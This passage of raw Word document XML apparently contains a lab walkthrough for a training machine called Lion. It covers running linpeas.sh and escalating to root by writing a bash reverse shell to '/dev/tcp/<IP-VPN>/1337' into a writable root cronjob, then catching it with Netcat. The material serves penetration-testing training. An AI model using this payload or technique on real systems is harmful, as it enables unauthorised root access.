    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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+x linpeas.sh</w:t>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48"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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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7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13100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nu8dj45u0vsu" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>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fdera0wsn6lp" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Privilege Escalation Exploiting Cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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8c1wto8s9ofy" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a cron job?</w:t>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Cron Jobs are used to schedule tasks by executing commands at specific dates and times on the server. They are most commonly used for system administrator tasks, such as backups or cleaning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directories, and so on. The word Cron comes from crontab and is located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/lion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a file </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://lion.bakcup.sh/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  that is a cronjob belonging to the root user.</w:t>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Fortunately, we have write permission on this file. We can insert a reverse shell inside this file.</w:t>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it is a root user cronjob, this file is configured to be executed every </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 minute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66"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edit this file and insert our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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/dev/tcp/&lt;IP-VPN&gt;/1337 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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4"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saving, we will open the Netcat listener to receive the connection.</w:t>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6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wait 1 minute, which is the execution time configured in the cron job and we get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root shell</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9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simply read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9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63"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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="20"/>
    <w:bookmarkEnd w:id="2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9" name="image23.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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9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9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Lion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2.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6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalatio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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/16"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5.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lion.bakcup.sh/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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3.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VU1bLvy1stszYEAFblRRJLmrug==">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